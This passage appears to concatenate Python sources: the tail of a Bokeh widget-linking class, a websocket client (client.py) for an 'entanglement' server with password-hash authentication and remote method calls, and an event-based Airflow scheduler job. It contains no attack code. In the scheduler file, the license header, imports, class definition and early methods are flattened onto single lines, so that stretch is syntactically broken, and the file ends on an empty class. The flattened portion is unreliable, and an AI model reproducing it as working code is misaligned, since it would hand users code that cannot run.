                w1_value = widgets[w1_idx].value
                values = w2_w1_val_mapping[space][w_title][w1_value]
        inds = [i for i, v in enumerate(values) if v == new]
        if inds == -1 or len(inds) == 0:
            return
        variableCell.cur_idx_dims_values[w_title] = inds
        if w2_title and w2_title in variableCell.cur_idx_dims_values:
            variableCell.cur_idx_dims_values[w2_title] = [0]
        variableCell.update_cds(space)

    @staticmethod
    def widget_callback_interactive(variableCell, attr, old, new, w_title, space):
        """Public entry point for interactive-mode widget changes."""
        CellWidgets._widget_callback_int(variableCell, attr, old, new, w_title, space)

    @staticmethod
    def widget_callback_static(variableCell, attr, old, new, w_title, space):
        """Public entry point for static-mode widget changes."""
        CellWidgets._widget_callback_static(variableCell, attr, old, new, w_title, space)

    @staticmethod
    def link_cells_widgets(grid):
        """Register every cell's widgets in ``grid.cells_widgets`` and
        js_link duplicate widgets so same-named menus move together."""
        for c_id, cell in grid.cells.items():
            cell_spaces = cell.get_spaces()
            for space in cell_spaces:
                for w_id, w in cell.get_widgets_in_space(space).items():
                    if w_id in grid.cells_widgets:
                        if space in grid.cells_widgets[w_id]:
                            grid.cells_widgets[w_id][space].append(c_id)
                        else:
                            grid.cells_widgets[w_id][space] = [c_id]
                        ## Every new widget is linked to the corresponding widget (of same name)
                        ## of the 1st space in grid.cells_widgets[w_id]
                        ## Find target cell to link with current cell
                        f_space = list(grid.cells_widgets[w_id].keys())[0]
                        CellWidgets._link_widget_to_target(grid, w, w_id, f_space)
                    else:
                        grid.cells_widgets[w_id] = {}
                        grid.cells_widgets[w_id][space] = [c_id]
                        f_space = list(grid.cells_widgets[w_id].keys())[0]
                        if f_space != space:
                            CellWidgets._link_widget_to_target(grid, w, w_id, f_space)
                        else:
                            w = grid.cells[c_id].get_widget(space, w_id)
                            w.on_change('value', partial(grid.ic.menu_item_click_callback, grid, space, w_id))

    @staticmethod
    def _link_widget_to_target(grid, w, w_id, f_space):
        """js_link ``w`` to the first registered widget of the same id."""
        if len(grid.cells_widgets[w_id][f_space]):
            t_c_id = grid.cells_widgets[w_id][f_space][0]
            t_w = grid.cells[t_c_id].get_widget(f_space, w_id)
            if t_w is not None and hasattr(t_w, 'js_link'):
                t_w.js_link('value', w, 'value')

    @staticmethod
    def set_plotted_widgets_interactive(grid):
        """Collect one representative widget per id/space and add a global
        reset button (interactive mode)."""
        grid.plotted_widgets = {}
        for w_id, space_widgets_dict in grid.cells_widgets.items():
            w_spaces = list(space_widgets_dict.keys())
            if len(w_spaces):
                f_space = w_spaces[0]
                f_w_list = space_widgets_dict[f_space]
                if len(f_w_list):
                    c_id = f_w_list[0]
                    for space in w_spaces:
                        if space not in grid.plotted_widgets:
                            grid.plotted_widgets[space] = {}
                        grid.plotted_widgets[space][w_id] = grid.cells[c_id].get_widget(f_space, w_id)
        b = Button(label='Reset Diagram', button_type="primary")
        b.on_click(partial(GlobalReset.global_reset_callback, grid))
        for space in grid.spaces:
            if space not in grid.plotted_widgets:
                grid.plotted_widgets[space] = {}
            grid.plotted_widgets[space]["resetButton"] = b

    @staticmethod
    def set_plotted_widgets_static(grid):
        """Collect one representative widget per id/space (static mode)."""
        grid.plotted_widgets = {}
        for w_id, space_widgets_dict in grid.cells_widgets.items():
            w_spaces = list(space_widgets_dict.keys())
            if len(w_spaces):
                f_space = w_spaces[0]
                f_w_list = space_widgets_dict[f_space]
                if len(f_w_list):
                    c_id = f_w_list[0]
                    for space in w_spaces:
                        if space not in grid.plotted_widgets:
                            grid.plotted_widgets[space] = {}
                        grid.plotted_widgets[space][w_id] = grid.cells[c_id].get_widget(f_space, w_id)
        for space in grid.spaces:
            if space not in grid.plotted_widgets:
                grid.plotted_widgets[space] = {}
# --- client.py ---
#!/usr/bin/python
from autobahn.twisted.websocket import WebSocketClientProtocol, WebSocketClientFactory
from twisted.internet import reactor
from twisted.internet.ssl import ClientContextFactory
import json
import hashlib
import sys
import bcrypt
import warnings
import ssl
import time
import traceback
from threading import Thread, Condition
from entangle.entanglement import Entanglement


def create_client(host, port, password, callback, fail, user=None, non_main=False, use_ssl=False, run_reactor=True):
    """Connect to an entanglement server over (secure) websocket and run the reactor.

    ``callback(entanglement)`` is invoked (on a worker thread) once
    authenticated; ``fail()`` is invoked when the connection closes.
    """

    class EntanglementClientProtocol(WebSocketClientProtocol):
        def close_entanglement(self):
            """Close the websocket from our side."""
            self.closedByMe = True
            self.sendClose()

        def onConnect(self, request):
            sys.stdout.flush()
            self.entanglement = Entanglement(self)
            # Authenticate: send sha256(password + fresh bcrypt salt) plus the salt.
            salt = bcrypt.gensalt().decode("utf-8")
            saltedPW = password + salt
            computedHash = hashlib.sha256(saltedPW.encode("utf-8")).hexdigest()
            if user is None:
                self.sendMessage("{} {}".format(computedHash, salt).encode("utf-8"), False)
            else:
                self.sendMessage("{} {} {}".format(user, computedHash, salt).encode("utf-8"), False)
            if callback is not None:
                # BUG FIX: Thread.setDaemon() is deprecated (Python 3.10+);
                # pass daemon=True to the constructor instead.
                self.thread = Thread(target=callback, args=(self.entanglement,), daemon=True)
                self.thread.start()

        def onOpen(self):
            pass

        def onMessage(self, payload, isBinary):
            # Text frames carry JSON packets; any binary frame closes the link.
            if not isBinary:
                packet = json.loads(payload.decode("utf-8"))
                if "error" in packet:
                    print(packet["error"])
                    sys.stdout.flush()
                elif "variable" in packet:
                    self.entanglement._notify(packet["variable"]["name"], packet["variable"]["value"])
                elif "call" in packet:
                    call_packet = packet["call"]
                    try:
                        fun = self.entanglement.__getattribute__(call_packet["name"])
                        args = call_packet["args"]
                        kwargs = call_packet["kwargs"]
                        fun(*args, **kwargs)
                    # BUG FIX: a bare "except:" also swallowed SystemExit and
                    # KeyboardInterrupt; catch Exception instead.
                    except Exception:
                        error = traceback.format_exc()
                        errormsg = "Error when invoking {} on entanglement with args {} and kwargs {}.\n{}".format(call_packet["name"], call_packet["args"], call_packet["kwargs"], error)
                        print(errormsg)
                        sys.stdout.flush()
                        result = {"error": errormsg}
                        self.sendMessage(json.dumps(result).encode("utf-8"), False)
            else:
                self.close_entanglement()

        def call_method(self, function, args, kwargs):
            """Send a remote method invocation packet."""
            result = {"call": {"name": function, "args": args, "kwargs": kwargs}}
            self.sendMessage(json.dumps(result).encode("utf-8"), False)

        def update_variable(self, name, value):
            """Send a variable-update packet."""
            result = {"variable": {"name": name, "value": value}}
            self.sendMessage(json.dumps(result).encode("utf-8"), False)

        def onClose(self, wasClean, code, reason):
            fail()
            # Give user code a chance to react before the reactor stops.
            on_close = getattr(self.entanglement, "on_close", None)
            if callable(on_close):
                on_close()
            sys.stdout.flush()
            reactor.stop()

    # Use the protocol to create a connection
    if not use_ssl:
        factory = WebSocketClientFactory(u"ws://" + host + ":" + str(port))
        factory.protocol = EntanglementClientProtocol
        reactor.connectTCP(host, port, factory)
    else:
        factory = WebSocketClientFactory(u"wss://" + host + ":" + str(port))
        factory.protocol = EntanglementClientProtocol
        reactor.connectSSL(host, port, factory, ClientContextFactory())
    if run_reactor:
        if non_main:
            reactor.run(installSignalHandlers=False)
        else:
            reactor.run()


class Client(object):
    """Wrapper around create_client that can run the reactor on a worker
    thread and blocks callers until the entanglement is available."""

    def __init__(self, host, port, password, user=None, callback=None, blocking=False, use_ssl=False, run_reactor=True):
        self._entanglement = None
        self._failed = False
        self.thread = None
        self.condition = Condition()
        self.callback = callback
        if blocking:
            create_client(host, port, password, self.__on_entangle, self.__on_fail, user, use_ssl=use_ssl, run_reactor=run_reactor)
        else:
            # BUG FIX: daemon kwarg replaces the deprecated setDaemon() call.
            self.thread = Thread(target=create_client,
                                 args=(host, port, password, self.__on_entangle, self.__on_fail, user, True, use_ssl, run_reactor),
                                 daemon=True)
            self.thread.start()

    def __on_entangle(self, entanglement):
        # Record the entanglement, graft thread helpers onto it, wake waiters.
        self._entanglement = entanglement
        self._entanglement.join = self.join
        self._entanglement.is_alive = self.is_alive
        self.condition.acquire()
        self.condition.notify()
        self.condition.release()
        if self.callback is not None:
            self.callback(entanglement)

    def __on_fail(self):
        # Connection closed/failed: wake any waiter so it does not hang.
        self._entanglement = None
        self._failed = True
        self.condition.acquire()
        self.condition.notify()
        self.condition.release()

    def get_entanglement(self):
        """Block until the connection succeeds (entanglement) or fails (None)."""
        self.condition.acquire()
        while self._entanglement is None and not self._failed:
            self.condition.wait()
        self.condition.release()
        return self._entanglement

    def join(self):
        """Wait for the reactor thread to finish (no-op in blocking mode)."""
        if self.thread is not None:
            self.thread.join()
            self.thread = None

    def is_alive(self):
        """Return True while the reactor thread is running."""
        if self.thread is not None:
            return self.thread.is_alive()
        else:
            return False


def connect(host, port, password, callback=None, user=None, use_ssl=False):
    """Connect and return the entanglement (blocks until connected or failed)."""
    if callback is not None:
        warnings.simplefilter('always', DeprecationWarning)  # turn off filter
        warnings.warn("Do not use callback parameter with this method. Either use Client(...) or connect without callback param. The entanglement will be returned.",
                      category=DeprecationWarning, stacklevel=2)
        warnings.simplefilter('default', DeprecationWarning)
    c = Client(host, port, password, callback=callback, user=user, use_ssl=use_ssl)
    return c.get_entanglement()


def connect_blocking(host, port, password, callback, use_ssl=False):
    """Deprecated: run the client on the calling thread."""
    warnings.simplefilter('always', DeprecationWarning)  # turn off filter
    warnings.warn("Call to deprecated function connect_blocking(...). Use Client(...) or connect(...) instead.",
                  category=DeprecationWarning, stacklevel=2)
    warnings.simplefilter('default', DeprecationWarning)
    Client(host, port, password, callback=callback, blocking=True, use_ssl=use_ssl)
# --- event_based_scheduler_job.py ---
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import os import sched import signal import sys import threading import time import faulthandler from typing import Callable, List, Optional from airflow.contrib.jobs.periodic_manager import PeriodicManager from airflow.exceptions import SerializedDagNotFound, AirflowException from airflow.models.dagcode import DagCode from airflow.models.message import IdentifiedMessage, MessageState from sqlalchemy import func, not_, or_, asc from sqlalchemy.orm import selectinload from sqlalchemy.orm.session import Session from airflow import models, settings from airflow.configuration import conf from airflow.executors.base_executor import BaseExecutor from airflow.jobs.base_job import BaseJob from airflow.models import DagModel from airflow.models.dag import DagEventDependencies, DAG from airflow.models.dagbag import DagBag from airflow.models.dagrun import DagRun from airflow.models.eventhandler import EventKey from airflow.models.serialized_dag import SerializedDagModel from airflow.models.taskinstance import TaskInstanceKey from airflow.stats import Stats from airflow.utils import timezone from airflow.utils.log.logging_mixin import LoggingMixin from airflow.utils.session import create_session, provide_session 
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks from airflow.utils.state import State from airflow.utils.types import DagRunType from airflow.utils.mailbox import Mailbox from airflow.events.scheduler_events import ( StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStatusChangedEvent, EventHandleEvent, RequestEvent, ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil, BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent) from notification_service.base_notification import BaseEvent from notification_service.client import EventWatcher, NotificationClient from airflow.contrib.jobs.dag_trigger import DagTrigger from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId from airflow.executors.scheduling_action import SchedulingAction TI = models.TaskInstance DR = models.DagRun DM = models.DagModel MSG = models.Message class EventBasedScheduler(LoggingMixin): def __init__(self, id, mailbox: Mailbox, task_event_manager: DagRunEventManager, executor: BaseExecutor, notification_client: NotificationClient, context=None, periodic_manager: PeriodicManager = None): super().__init__(context) self.id = id self.mailbox = mailbox self.task_event_manager: DagRunEventManager = task_event_manager self.executor = executor self.notification_client = notification_client self.dagbag = DagBag(read_dags_from_db=True) self._timer_handler = None self.timers = sched.scheduler() self.periodic_manager = periodic_manager def sync(self): def call_regular_interval( delay: float, action: Callable, arguments=(), kwargs={}, ): # pylint: disable=dangerous-default-value def repeat(*args, **kwargs): action(*args, **kwargs) # This is not perfect. If we want a timer every 60s, but action # takes 10s to run, this will run it every 70s. 
# Good enough for now self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs) self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs) call_regular_interval( delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'), action=self.executor.sync ) self.timers.run() def stop_timer(self): if self.timers and self._timer_handler: self.timers.cancel(self._timer_handler) def submit_sync_thread(self): threading.Thread(target=self.sync).start() def schedule(self) -> bool: identified_message = self.mailbox.get_identified_message() if not identified_message: return True origin_event = identified_message.deserialize() self.log.debug("Event: {}".format(origin_event)) if SchedulerInnerEventUtil.is_inner_event(origin_event): event = SchedulerInnerEventUtil.to_inner_event(origin_event) else: event = origin_event with create_session() as session: if isinstance(event, BaseEvent): dagruns = self._find_dagruns_by_event(event, session) for dagrun in dagruns: dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id) self.task_event_manager.handle_event(dag_run_id, event) elif isinstance(event, RequestEvent): self._process_request_event(event) elif isinstance(event, TaskSchedulingEvent): self._schedule_task(event) elif isinstance(event, TaskStatusChangedEvent): dagrun = self._find_dagrun(event.dag_id, event.execution_date, session) tasks = self._find_scheduled_tasks(dagrun, session) self._send_scheduling_task_events(tasks, SchedulingAction.START) if dagrun.state in State.finished: self.mailbox.send_message(DagRunFinishedEvent(dagrun.run_id).to_event()) elif isinstance(event, DagExecutableEvent): dagrun = self._create_dag_run(event.dag_id, session=session) tasks = self._find_scheduled_tasks(dagrun, session) self._send_scheduling_task_events(tasks, SchedulingAction.START) elif isinstance(event, EventHandleEvent): dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id) assert len(dag_runs) == 1 ti = 
dag_runs[0].get_task_instance(event.task_id) self._send_scheduling_task_event(ti, event.action) elif isinstance(event, StopDagEvent): self._stop_dag(event.dag_id, session) elif isinstance(event, DagRunFinishedEvent): self._remove_periodic_events(event.run_id) elif isinstance(event, PeriodicEvent): dag_runs = DagRun.find(run_id=event.run_id) assert len(dag_runs) == 1 ti = dag_runs[0].get_task_instance(event.task_id) self._send_scheduling_task_event(ti, SchedulingAction.RESTART) elif isinstance(event, StopSchedulerEvent): self.log.info("{} {}".format(self.id, event.job_id)) if self.id == event.job_id or 0 == event.job_id: self.log.info("break the scheduler event loop.") identified_message.remove_handled_message() session.expunge_all() return False elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent): pass elif isinstance(event, ResponseEvent): pass else: self.log.error("can not handler the event {}".format(event)) identified_message.remove_handled_message() session.expunge_all() return True def stop(self) -> None: self.mailbox.send_message(StopSchedulerEvent(self.id).to_event()) self.log.info("Send stop event to the scheduler.") def recover(self, last_scheduling_id): lost_dag_codes = DagCode.recover_lost_dag_code() self.log.info("Found %s dags not exists in DAG folder, recovered from DB. 
Dags' path: %s", len(lost_dag_codes), lost_dag_codes)
        # NOTE: the lines above are the tail of recover(); the method header is
        # outside this chunk. Below: wait for the executor to rebuild its state,
        # then re-send every message the previous scheduler job left QUEUED.
        self.log.info("Waiting for executor recovery...")
        self.executor.recover_state()
        unprocessed_messages = self.get_unprocessed_message(last_scheduling_id)
        self.log.info("Recovering %s messages of last scheduler job with id: %s",
                      len(unprocessed_messages), last_scheduling_id)
        for msg in unprocessed_messages:
            self.mailbox.send_identified_message(msg)

    @staticmethod
    def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]:
        """Return all QUEUED messages of the given scheduler job, ordered by ascending id.

        :param last_scheduling_id: id of the previous scheduler job whose
            unprocessed (state == QUEUED) messages should be replayed.
        :return: list of ``IdentifiedMessage`` wrapping each row's data and id.
        """
        with create_session() as session:
            results: List[MSG] = session.query(MSG).filter(
                MSG.scheduling_job_id == last_scheduling_id,
                MSG.state == MessageState.QUEUED
            ).order_by(asc(MSG.id)).all()
        unprocessed: List[IdentifiedMessage] = []
        for msg in results:
            unprocessed.append(IdentifiedMessage(msg.data, msg.id))
        return unprocessed

    def _find_dagrun(self, dag_id, execution_date, session) -> DagRun:
        """Look up a single DagRun by (dag_id, execution_date); None if absent."""
        dagrun = session.query(DagRun).filter(
            DagRun.dag_id == dag_id,
            DagRun.execution_date == execution_date
        ).first()
        return dagrun

    def _register_periodic_events(self, run_id, dag):
        """Register every task of ``dag`` that carries a 'periodic_config' in its
        executor_config with the periodic manager, keyed by this run_id."""
        for task in dag.tasks:
            if task.executor_config is not None and 'periodic_config' in task.executor_config:
                self.log.debug('register periodic task {} {}'.format(run_id, task.task_id))
                self.periodic_manager.add_task(run_id=run_id,
                                               task_id=task.task_id,
                                               periodic_config=task.executor_config['periodic_config'])

    @provide_session
    def _remove_periodic_events(self, run_id, session=None):
        """Unregister all periodic tasks of the dag that owns ``run_id``.

        NOTE(review): assumes DagRun.find(run_id=...) returns at least one row;
        an unknown run_id would raise IndexError here — confirm callers guarantee it.
        """
        dagruns = DagRun.find(run_id=run_id)
        dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session)
        for task in dag.tasks:
            if task.executor_config is not None and 'periodic_config' in task.executor_config:
                self.log.debug('remove periodic task {} {}'.format(run_id, task.task_id))
                self.periodic_manager.remove_task(run_id, task.task_id)

    def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED) -> DagRun:
        """Create a DagRun for ``dag_id`` under a commit-prohibited session.

        For SCHEDULED runs the execution date comes from DagModel.next_dagrun
        (and the model's next-run fields are advanced afterwards); for MANUAL
        runs the current UTC time is used and external_trigger is set.

        :return: the new DagRun, or None if the dag model is missing or the
            serialized DAG cannot be found (other errors are logged and
            implicitly return None as well).
        """
        with prohibit_commit(session) as guard:
            if settings.USE_JOB_SCHEDULE:
                """
                Unconditionally create a DAG run for the given
                DAG, and update the dag_model's fields to control if/when the next
                DAGRun should be created
                """
                try:
                    dag = self.dagbag.get_dag(dag_id, session=session)
                    dag_model = session \
                        .query(DagModel).filter(DagModel.dag_id == dag_id).first()
                    if dag_model is None:
                        return None
                    next_dagrun = dag_model.next_dagrun
                    dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
                    external_trigger = False
                    # Manual runs execute "now" and are flagged as externally triggered.
                    if run_type == DagRunType.MANUAL:
                        next_dagrun = timezone.utcnow()
                        external_trigger = True
                    dag_run = dag.create_dagrun(
                        run_type=run_type,
                        execution_date=next_dagrun,
                        start_date=timezone.utcnow(),
                        state=State.RUNNING,
                        external_trigger=external_trigger,
                        session=session,
                        dag_hash=dag_hash,
                        creating_job_id=self.id,
                    )
                    if run_type == DagRunType.SCHEDULED:
                        self._update_dag_next_dagrun(dag_id, session)
                    # commit the session - Release the write lock on DagModel table.
                    guard.commit()
                    # END: create dagrun
                    self._register_periodic_events(dag_run.run_id, dag)
                    return dag_run
                except SerializedDagNotFound:
                    self.log.exception("DAG '%s' not found in serialized_dag table", dag_id)
                    return None
                except Exception:
                    # Broad catch: any failure here is logged and the method
                    # falls through returning None to the caller.
                    self.log.exception("Error occurred when create dag_run of dag: %s", dag_id)

    def _update_dag_next_dagrun(self, dag_id, session):
        """
        Update next_dagrun / next_dagrun_create_after on the DagModel.

        If the dag is at (or above) max_active_runs, run creation is suspended
        by clearing next_dagrun_create_after; otherwise both fields are advanced
        via dag.next_dagrun_info(). (Only non-externally-triggered RUNNING runs
        are counted.)
        """
        active_runs_of_dag = session \
            .query(func.count('*')).filter(
                DagRun.dag_id == dag_id,
                DagRun.state == State.RUNNING,
                DagRun.external_trigger.is_(False),
            ).scalar()
        dag_model = session \
            .query(DagModel).filter(DagModel.dag_id == dag_id).first()
        dag = self.dagbag.get_dag(dag_id, session=session)
        if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
            self.log.info(
                "DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
                dag.dag_id,
                active_runs_of_dag,
                dag.max_active_runs,
            )
            dag_model.next_dagrun_create_after = None
        else:
            dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
                dag_model.next_dagrun
            )

    def _schedule_task(self, scheduling_event: TaskSchedulingEvent):
        """Forward a task scheduling event to the executor as (task key, action)."""
        task_key = TaskInstanceKey(
            scheduling_event.dag_id,
            scheduling_event.task_id,
            scheduling_event.execution_date,
            scheduling_event.try_number
        )
        self.executor.schedule_task(task_key, scheduling_event.action)

    def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]:
        """Return all RUNNING DagRuns whose dag declares a dependency on ``event``.

        Dependencies are read from each serialized dag's event_relationships
        (DagEventDependencies) and matched against the event's key/type/
        namespace/sender. Returns an empty list when nothing matches.
        """
        affect_dag_runs = []
        event_key = EventKey(event.key, event.event_type, event.namespace, event.sender)
        dag_runs = session \
            .query(DagRun).filter(DagRun.state == State.RUNNING).all()
        self.log.debug('dag_runs {}'.format(len(dag_runs)))
        if dag_runs is None or len(dag_runs) == 0:
            return affect_dag_runs
        dags = session.query(SerializedDagModel).filter(
            SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs)
        ).all()
        self.log.debug('dags {}'.format(len(dags)))
        affect_dags = set()
        for dag in dags:
            self.log.debug('dag config {}'.format(dag.event_relationships))
            self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace))
            dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships)
            if dep.is_affect(event_key):
                affect_dags.add(dag.dag_id)
        if len(affect_dags) == 0:
            return affect_dag_runs
        for dag_run in dag_runs:
            if dag_run.dag_id in affect_dags:
                affect_dag_runs.append(dag_run)
        return affect_dag_runs

    def _find_scheduled_tasks(
            self,
            dag_run: DagRun,
            session: Session,
            check_execution_date=False
    ) -> Optional[List[TI]]:
        """
        Make scheduling decisions about an individual dag run

        ``currently_active_runs`` is passed in so that a batch query can be
        used to ask this for all dag runs in the batch, to avoid an n+1 query.

        :param dag_run: The DagRun to schedule
        :return: scheduled tasks
        """
        if not dag_run or dag_run.get_state() in State.finished:
            return
        try:
            dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
        except SerializedDagNotFound:
            self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
            return None
        if not dag:
            self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
            return None
        # Execution dates of this dag's unfinished task instances.
        currently_active_runs = session.query(
            TI.execution_date,
        ).filter(
            TI.dag_id == dag_run.dag_id,
            TI.state.notin_(list(State.finished)),
        ).all()
        if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
            self.log.warning("Execution date is in future: %s", dag_run.execution_date)
            return None
        if dag.max_active_runs:
            if (
                    len(currently_active_runs) >= dag.max_active_runs
                    and dag_run.execution_date not in currently_active_runs
            ):
                self.log.info(
                    "DAG %s already has %d active runs, not queuing any tasks for run %s",
                    dag.dag_id,
                    len(currently_active_runs),
                    dag_run.execution_date,
                )
                return None
        self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
        # callback_to_run is returned by update_state but not used here.
        schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
        dag_run.schedule_tis(schedulable_tis, session)
        session.commit()
        # Pick up SCHEDULED task instances of unpaused dags (excluding backfill
        # runs), with row locks so concurrent schedulers skip locked rows.
        query = (session.query(TI)
                 .outerjoin(TI.dag_run)
                 .filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
                 .join(TI.dag_model)
                 .filter(not_(DM.is_paused))
                 .filter(TI.state == State.SCHEDULED)
                 .options(selectinload('dag_model')))
        scheduled_tis: List[TI] = with_row_locks(
            query,
            of=TI,
            **skip_locked(session=session),
        ).all()
        # filter need event tasks: tasks that wait on events are dispatched by
        # the event mechanism, not by this method.
        serialized_dag = session.query(SerializedDagModel).filter(
            SerializedDagModel.dag_id == dag_run.dag_id).first()
        final_scheduled_tis = []
        event_task_set = []
        if serialized_dag:
            dep: DagEventDependencies = DagEventDependencies.from_json(serialized_dag.event_relationships)
            event_task_set = dep.find_event_dependencies_tasks()
        else:
            self.log.error("Failed to get serialized_dag from db, unexpected dag id: %s", dag_run.dag_id)
        for ti in scheduled_tis:
            if ti.task_id not in event_task_set:
                final_scheduled_tis.append(ti)
        return final_scheduled_tis

    @provide_session
    def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
        """Only run DagRun.verify_integrity if Serialized DAG has changed since it is slow."""
        latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
        if dag_run.dag_hash == latest_version:
            self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
            return
        dag_run.dag_hash = latest_version
        # Refresh the DAG
        dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
        # Verify integrity also takes care of session.flush
        dag_run.verify_integrity(session=session)

    def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction):
        """Publish one TaskSchedulingEvent for ``ti`` to the mailbox.

        No-op when ti is None or the action is NONE.
        """
        if ti is None or action == SchedulingAction.NONE:
            return
        task_scheduling_event = TaskSchedulingEvent(
            ti.task_id,
            ti.dag_id,
            ti.execution_date,
            ti.try_number,
            action
        )
        self.mailbox.send_message(task_scheduling_event.to_event())

    def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction):
        """Send one scheduling event per task instance; tolerates tis=None."""
        if tis is None:
            return
        for ti in tis:
            self._send_scheduling_task_event(ti, action)

    @provide_session
    def _emit_pool_metrics(self, session: Session = None) -> None:
        """Emit open/queued/running slot gauges for every pool to Stats."""
        pools = models.Pool.slots_stats(session=session)
        for pool_name, slot_stats in pools.items():
            Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
            Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
            Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])

    @staticmethod
    def _reset_unfinished_task_state(dag_run):
        """Reset to NONE every task instance of ``dag_run`` whose state is
        unfinished but neither RUNNING nor QUEUED (i.e. interrupted mid-flight)."""
        with create_session() as session:
            to_be_reset = [s for s in State.unfinished if s not in [State.RUNNING, State.QUEUED]]
            tis = dag_run.get_task_instances(to_be_reset, session)
            for ti in tis:
                ti.state = State.NONE
            session.commit()

    @provide_session
    def restore_unfinished_dag_run(self, session):
        """Resume scheduling of every examinable dag run after a restart:
        reset interrupted task states, recompute schedulable tasks and send
        START events for them."""
        dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all()
        if not dag_runs or len(dag_runs) == 0:
            return
        for dag_run in dag_runs:
            self._reset_unfinished_task_state(dag_run)
            tasks = self._find_scheduled_tasks(dag_run, session)
            self._send_scheduling_task_events(tasks, SchedulingAction.START)

    @provide_session
    def heartbeat_callback(self, session: Session = None) -> None:
        # Metric-only heartbeat; no scheduling work happens here.
        Stats.incr('scheduler_heartbeat', 1, 1)

    @provide_session
    def _process_request_event(self, event: RequestEvent, session: Session = None):
        """Handle a user request event (RUN_DAG / STOP_DAG_RUN / EXECUTE_TASK)
        and reply with a ResponseEvent carrying the affected run_id (or None
        on failure). All exceptions are logged, never propagated."""
        try:
            message = BaseUserDefineMessage()
            message.from_json(event.body)
            if message.message_type == UserDefineMessageType.RUN_DAG:
                # todo make sure dag file is parsed.
                dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL)
                if not dagrun:
                    self.log.error("Failed to create dag_run.")
                    # TODO Need to add ret_code and error_msg in ExecutionContext in case of exception
                    self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event())
                    return
                tasks = self._find_scheduled_tasks(dagrun, session, False)
                self._send_scheduling_task_events(tasks, SchedulingAction.START)
                self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
            elif message.message_type == UserDefineMessageType.STOP_DAG_RUN:
                dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
                self._stop_dag_run(dag_run)
                self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event())
            elif message.message_type == UserDefineMessageType.EXECUTE_TASK:
                dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
                ti: TI = dagrun.get_task_instance(task_id=message.task_id)
                self.mailbox.send_message(TaskSchedulingEvent(
                    task_id=ti.task_id,
                    dag_id=ti.dag_id,
                    execution_date=ti.execution_date,
                    try_number=ti.try_number,
                    action=SchedulingAction(message.action)
                ).to_event())
                self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
        except Exception:
            self.log.exception("Error occurred when processing request event.")

    def _stop_dag(self, dag_id, session: Session):
        """
        Stop the dag. Pause the dag and cancel all running dag_runs and task_instances.
        """
        DagModel.get_dagmodel(dag_id, session) \
            .set_is_paused(is_paused=True, including_subdags=True, session=session)
        active_runs = DagRun.find(dag_id=dag_id, state=State.RUNNING)
        for dag_run in active_runs:
            self._stop_dag_run(dag_run)

    def _stop_dag_run(self, dag_run: DagRun):
        """Stop one dag run: mark it stopped, ask the executor to STOP every
        unfinished task instance, then announce the run as finished."""
        dag_run.stop_dag_run()
        for ti in dag_run.get_task_instances():
            if ti.state in State.unfinished:
                self.executor.schedule_task(ti.key, SchedulingAction.STOP)
        self.mailbox.send_message(DagRunFinishedEvent(run_id=dag_run.run_id).to_event())


class SchedulerEventWatcher(EventWatcher):
    """Forwards every notification event it observes into the scheduler mailbox."""

